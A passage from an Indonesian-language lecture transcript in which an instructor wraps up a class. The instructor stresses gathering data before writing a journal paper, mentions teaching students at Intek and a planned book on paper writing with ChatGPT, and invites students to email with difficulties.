data. Harus punya data, ngutak-atik ngoprek, ngumpulin data. Kalau data udah ada, bikin paper jurnalnya gampang. Yang susah kita mau nulis paper jurnal, tapi data nggak punya. Itu nggak akan bisa bikin paper jurnal tanpa data. Jadi sarannya cari datanya dulu, ngutak-atik ngoprek, cari data, supaya datanya beres. Nah kalau data udah ada, kita bisa bikin paper jurnal. Ini buat yang dari Intek, solusi Intek, itu tanggal berapa nih saya dijadwalin ke Intek sih sebenarnya. Buat ngajarin anak-anak yang di Intek buat nulis paper jurnal. Langsung. Jadi ada sekitar 60 apa berapa dari Intek yang jadi mahasiswa ITTS ya. Nah itu yang di Intek agak beruntung. Yang bukan di Intek saya akan rekam jadi bisa ngelihat ininya, dan saya akan bikin buku cara nulis paper jurnal pakai ChatGPT-nya sih. Gitu. Ada sih ya. Nggak ada, aman. Ini kepala udah mulai ngebul soalnya ngajar dari pagi dari jam 5 Oke, nggak ada pertanyaan. Kalau ada apa-apa, tolong email. Kalau ada kesulitan apa, tolong email lah. Jangan dipendam sendirian. Bisa parah tuh. Oke, saya tutup sampai sekian dulu. Mudah-mudahan bisa bermanfaat. Billahi taufiq wal hidayah. Assalamualaikum warahmatullahi wabarakatuh. Oke, sampai minggu depan ya. Thank you. Ini saya tutup. Di close.